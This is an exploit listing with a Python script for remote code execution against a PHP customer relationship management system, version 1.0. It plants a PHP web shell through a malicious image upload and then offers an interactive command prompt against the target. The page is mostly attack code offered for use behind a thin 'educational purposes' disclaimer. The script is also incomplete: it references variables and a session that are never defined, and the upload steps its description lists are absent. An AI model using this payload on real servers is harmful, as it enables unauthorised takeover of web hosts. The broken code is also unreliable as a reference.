Exploits / Vulnerability Discovered : 2021-06-21 |
Type : webapps |
Platform : php
This exploit / vulnerability Customer relationship management system (crm) 1.0 remote code execution is for educational purposes only and if it is used you will do on your own risk!
# REQUREMENTS #
# run pip3 install requests colorama beautifulsoup4
# DESCRIPTION #
# # Customer relationship management system is vulnerable to malicious file upload on account update option & customer create option
# # Exploit Working:
# # 1. Starting a session with the server
# # 2. Registering a user hackerctf : hackerctf and adding payload in image
# # 3. Finding the uploaded file location in the username image tag
# # 4. Runing the payload file to give a shell
#!/usr/bin/python3
import requests , time
from bs4 import BeautifulSoup as bs
from colorama import Fore, Back, Style
# Variables : change the URL according to need
URL="http://192.168.0.245/crm/" # CHANGE THIS
shellcode = "<?php system($_GET['cmd']);?>"
filename = "shell.php"
content_data = {"id":"","firstname":"ishan","lastname":"saha","username":"hackerctf","password":"hackerctf"}
authdata={"username":"hackerctf","password":"hackerctf"}
def format_text(title,item):
cr = '\r\n'
section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr
item=str(item)
text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
return text
#print statements
print(format_text("Target",URL),end='')
print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')
print(format_text("shell location",location),end='')
print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))
while True:
cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)
if cmd == 'exit':
break
print(ShellSession.get(location + "?cmd="+cmd).content.decode())
Customer relationship management system (crm) 1.0 remote code execution